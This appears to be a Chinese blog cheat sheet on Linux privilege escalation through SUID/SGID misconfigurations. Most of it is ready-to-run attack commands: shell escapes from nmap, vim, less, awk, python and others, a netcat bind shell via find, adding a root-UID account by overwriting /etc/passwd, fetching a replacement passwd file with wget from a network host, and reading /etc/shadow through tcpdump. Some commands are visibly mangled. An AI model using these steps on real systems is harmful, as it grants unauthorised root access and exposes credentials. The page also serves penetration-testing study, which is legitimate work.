linux提权-Suid和Guid配置错误

  • A+
所属分类:安全文章

描述



SUID代表设置的用户ID,是一种Linux功能,允许用户在指定用户的许可下执行文件。例如,Linux ping命令通常需要root权限才能打开网络套接字。通过将ping程序标记为SUID(所有者为root),只要低特权用户执行ping程序,便会以root特权执行ping。


SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。


当运行具有suid权限的二进制文件时,它将以其他用户身份运行,因此具有其他用户特权。它可以是root用户,也可以只是另一个用户。如果在程序中设置了suid,该位可以生成shell或以其他方式滥用,我们可以使用它来提升我们的特权。



以下是一些可用于产生SHELL的程序:

nmap
vim
less
more
nano
cp
mv
find


查找suid和guid文件


Find SUID
find / -perm -u=s -type f 2>/dev/null

Find GUID
find / -perm -g=s -type f 2>/dev/null

其他命令

命令 结果
find / -perm -4000 -type f 2>/dev/null 查找SUID文件
find / -uid 0 -perm -4000 -type f 2>/dev/null 查找root拥有的SUID文件
find / -perm -2000 -type f 2>/dev/null 查找SGID文件(粘性位)
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null 查找世界可写文件,不包括proc文件
find / -type f '(' -name *.cert -or -name *.crt -or -name *.pem -or -name *.ca -or -name *.p12 -or -name *.cer -name *.der ')' '(' '(' -user support -perm -u=r ')' -or '(' -group support -perm -g=r ')' -or '(' -perm -o=r ')' ')' 2> /dev/null-or -name *.cer -name *.der ')' 2> /dev/null 查找您可以阅读的密钥或证书
find /home –name *.rhosts -print 2>/dev/null 查找rhost配置文件
find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ; 查找hosts.equiv,列出权限并管理文件内容
cat ~/.bash_history 显示当前用户历史记录
ls -la ~/.*_history 向当前用户分发各种历史文件
ls -la ~/.ssh/ 检查当前用户的ssh文件
find /etc -maxdepth 1 -name '*.conf' -type f 要么 ls -la /etc/*.conf 在/ etc中列出配置文件(深度1,在第一个命令中修改maxdepth参数以对其进行更改)
lsof | grep '/home/|/etc/|/opt/' 显示可能有趣的打开文件


也可以使用 sudo -l 命令列出当前用户可执行的命令


常用提权方式


nmap

find / -perm -u = s -type f 2> / dev / null –查找设置了SUID位的可执行文件
ls -la / usr / local / bin / nmap –让我们确认nmap是否设置了SUID位。

Nmap的SUID位置1。很多时候,管理员将SUID位设置为nmap,以便可以有效地扫描网络,因为如果不使用root特权运行它,则所有的nmap扫描技术都将无法使用。

但是,nmap(2.02-5.21)存在交换模式,可利用提权,我们可以在此模式下以交互方式运行nmap,从而可以转至shell。如果nmap设置了SUID位,它将以root特权运行,我们可以通过其交互模式访问'root'shell。

nmap –interactive –运行nmap交互模式

!sh –我们可以从nmap shell转到系统shell

msf中的模块为:

exploit/unix/local/setuid_nmap

较新版可使用 --script 参数:

echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse


 

find

touch test

 nc 反弹 shell:

find test -exec netcat -lvp 5555 -e /bin/sh ;


 

vi/vim

打开vim,按下ESC

:set shell=/bin/sh


:shell
或者
sudo vim -c '!sh'



bash

bash -p

bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

less

less /etc/passwd

!/bin/sh

more

more /home/pelle/myfile

!/bin/bash

cp

覆盖 /etc/shadow 或 /etc/passwd


 [[email protected] ~]$ cat /etc/passwd >passwd

[[email protected] ~]$ openssl passwd -1 -salt hack hack123
$1$hack$WTn0dk2QjNeKfl.DHOUue0
[[email protected] ~]$ echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash' >> passwd
[[email protected] ~]$ cp passwd /etc/passwd
[[email protected] ~]$ su - hack
Password:
[[email protected] ~]# id
uid=0(hack) gid=0(root) groups=0(root)
[[email protected] ~]# cat /etc/passwd|tail -1
hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash



mv

覆盖 /etc/shadow 或 /etc/passwd


[[email protected] ~]$ cat /etc/passwd >passwd
[[email protected] ~]$ openssl passwd -1 -salt hack hack123
$1$hack$WTn0dk2QjNeKfl.DHOUue0
[[email protected] ~]$ echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash' >> passwd
[[email protected] ~]$ mv passwd /etc/passwd
[[email protected] ~]$ su - hack
Password:
[[email protected] ~]# id
uid=0(hack) gid=0(root) groups=0(root)
[[email protected] ~]# cat /etc/passwd|tail -1
hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash


nano

nano  /etc/passwd


awk

awk 'BEGIN {system("/bin/sh")}'

man

man passwd

!/bin/bash

 

wget

wget http://192.168.56.1:8080/passwd -O /etc/passwd


 

apache

仅可查看文件,不能弹 shell:


apache2 -f /etc/shadow



 

tcpdump

echo $'idncat /etc/shadow' > /tmp/.test

chmod +x /tmp/.test

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root


 

python/perl/ruby/lua/php/etc


python


 python -c "import os;os.system('/bin/bash')"


 

perl


exec "/bin/bash";

一点以前的笔记 

技术不高


 

渗透测试 红队攻防 免杀 权限维持 等等技术 

及时分享最新漏洞复现以及EXP 国内外最新技术分享!!!

进来一起学习吧

linux提权-Suid和Guid配置错误


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: